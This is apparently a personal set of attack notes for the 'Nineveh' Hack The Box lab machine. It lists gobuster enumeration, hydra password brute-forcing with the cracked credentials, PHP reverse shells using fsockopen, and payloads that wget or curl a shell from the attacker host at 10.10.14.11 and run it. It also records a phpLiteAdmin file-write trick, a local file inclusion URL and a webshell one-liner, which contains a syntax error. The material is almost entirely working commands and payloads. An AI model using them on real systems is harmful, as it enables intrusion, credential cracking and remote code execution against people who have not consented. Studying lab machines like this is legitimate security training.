gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.43 -o http-output.txt

Ignore SSL error:
root@kali:~/HTB/Nineveh# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.43 -o https-output.txt -k

Find:
http://10.10.10.43/department/login.php
https://10.10.10.43/db/


Hydra:

root@kali:~/HTB/Nineveh# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64

For Department page:

[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found



root@kali:~/HTB/Nineveh# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64

For PHP Lite Admin page:

[443][http-post-form] host: 10.10.10.43   login: admin   password: password123

Show details by -x:
root@kali:~/HTB/Nineveh# searchsploit -x 24044.txt

Then make reverse shells(shells.txt):
'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' --->
<?php $sock=fsockopen("10.10.14.11",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>
----------------------------------------------------------------------------------------------------
Creating new table: 'ninevehNotes' Field=1

Direct wget php command:
<?php system("wget http://10.10.14.11/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

Rename table:
Table 'ninevehNotes' has been renamed to '/var/tmp/ninevehNotes.txt'.
ALTER TABLE "ninevehNotes" RENAME TO '/var/tmp/ninevehNotes.php'
----------------------------------------------------------------------------------------------------
PoC first:
<?php phpinfo()?>
On:
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.txt.shell.php

No "http://", then
<?php system("curl 10.10.14.11/shell.txt"); ?>


Try: 
<?php system("curl 10.10.14.11/shell.txt -o /var/tmp/nineveNotes12.php"); ?>

<?php echo system($_REQUEST["ipp"]; ?>








